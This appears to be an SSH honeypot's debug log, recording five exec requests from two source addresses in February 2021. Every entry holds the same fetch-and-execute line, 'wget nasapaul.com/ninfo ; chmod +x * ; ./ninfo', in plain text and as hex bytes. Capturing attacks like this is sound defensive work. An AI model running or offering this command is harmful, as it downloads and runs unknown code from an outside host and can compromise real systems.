19:39:22.438 services ▶ DEBU 783e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000dedc0 {{0 0} [0xc000dbcd80] 0} 0xc000e95c80 {0 0} 0xc000e95ce0 0xc000e95d40 0xc000032ec0 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000e95e00) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000e95da0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0011494c8 {0 0 0 <nil> <nil>} 824633929584}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032f80 0xc0065a0060 0xc0065a0060 false}) %!s(*ssh.buffer=&{0xc000032fc0 0xc0065a00a0 0xc0065a00a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-16 19:39:22.438929832 +0000 UTC m=+1544150.720325611, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=47254, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0m1uq8k9kn000dnb0pg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
06:41:22.360 services ▶ DEBU 7ced Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000e40000] 0} 0xc0065784e0 {0 0} 0xc006578540 0xc0065785a0 0xc000032300 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc0011d65a0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc0011d6540) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc006628570 {0 0 0 <nil> <nil>} 824649040112}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c140 0xc0011fe060 0xc0011fe060 false}) %!s(*ssh.buffer=&{0xc000e9c180 0xc0011fe0a0 0xc0011fe0a0 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-17 06:41:22.362375011 +0000 UTC m=+1583870.643770813, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=43054, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbl48k9kn000dnb5gg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
06:45:17.966 services ▶ DEBU 7d4e Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc0000ba240] 0} 0xc006578240 {0 0} 0xc0065782a0 0xc006578360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc006578480) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc006578420) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000e90770 {0 0 0 <nil> <nil>} 824633926256}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000032300 0xc001151640 0xc001151640 false}) %!s(*ssh.buffer=&{0xc000032580 0xc001151700 0xc001151700 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-17 06:45:17.966566009 +0000 UTC m=+1584106.247961833, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=188.166.124.29, source-port=45688, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0mbmv8k9kn000dnb5sg, token=c0a8v4ok9kn000dn77n0, type=ssh-request
16:00:26.520 services ▶ DEBU a883 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de000 {{0 0} [0xc000dee000] 0} 0xc0011d61e0 {0 0} 0xc0011d6240 0xc0011d6360 0xc000032140 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efa720) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efa6c0) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc0004827d0 {0 0 0 <nil> <nil>} 824649040496}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9c280 0xc0011fe240 0xc0011fe240 false}) %!s(*ssh.buffer=&{0xc000e9c2c0 0xc0011fe280 0xc0011fe280 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-25 16:00:26.521731488 +0000 UTC m=+2308614.803127297, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=41574, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rsj68k9kn000dnchng, token=c0a8v4ok9kn000dn77n0, type=ssh-request
16:03:19.025 services ▶ DEBU a8e8 Request: &{session %!s(uint32=0) %!s(uint32=0) %!s(uint32=32768) %!s(uint32=32768) %!s(*ssh.mux=&{0xc0000de9a0 {{0 0} [0xc0000ba540] 0} 0xc000efac00 {0 0} 0xc000efac60 0xc000efad20 0xc000e9ca40 <nil>}) %!s(bool=true) %!s(ssh.channelDirection=0) %!s(chan interface {}=0xc000efade0) {%!s(int32=0) %!s(uint32=0)} %!s(chan *ssh.Request=0xc000efad80) %!s(bool=false) {%!s(*sync.Cond=&{{} 0xc000482f08 {0 0 0 <nil> <nil>} 824649042672}) %!s(uint32=262144) %!s(int=0) %!s(bool=false)} %!s(*ssh.buffer=&{0xc000e9cb00 0xc000e99e00 0xc000e99e00 false}) %!s(*ssh.buffer=&{0xc000e9cb40 0xc000e99e40 0xc000e99e40 false}) {%!s(int32=0) %!s(uint32=0)} %!s(uint32=2097152) {%!s(int32=0) %!s(uint32=0)} %!s(bool=false) map[]} exec %!s(bool=true) .wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
services > ssh > category=ssh, date=2021-02-25 16:03:19.02608191 +0000 UTC m=+2308787.307477687, destination-ip=172.17.0.2, destination-port=8022, sensor=services, source-ip=136.244.96.12, source-port=37354, ssh.exec=[]string{"wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo"}, ssh.payload=[]byte{0x0, 0x0, 0x0, 0x2e, 0x77, 0x67, 0x65, 0x74, 0x20, 0x6e, 0x61, 0x73, 0x61, 0x70, 0x61, 0x75, 0x6c, 0x2e, 0x63, 0x6f, 0x6d, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f, 0x20, 0x3b, 0x20, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2b, 0x78, 0x20, 0x2a, 0x20, 0x3b, 0x20, 0x2e, 0x2f, 0x6e, 0x69, 0x6e, 0x66, 0x6f}, ssh.request-type=exec, ssh.sessionid=c0rskhgk9kn000dnci40, token=c0a8v4ok9kn000dn77n0, type=ssh-request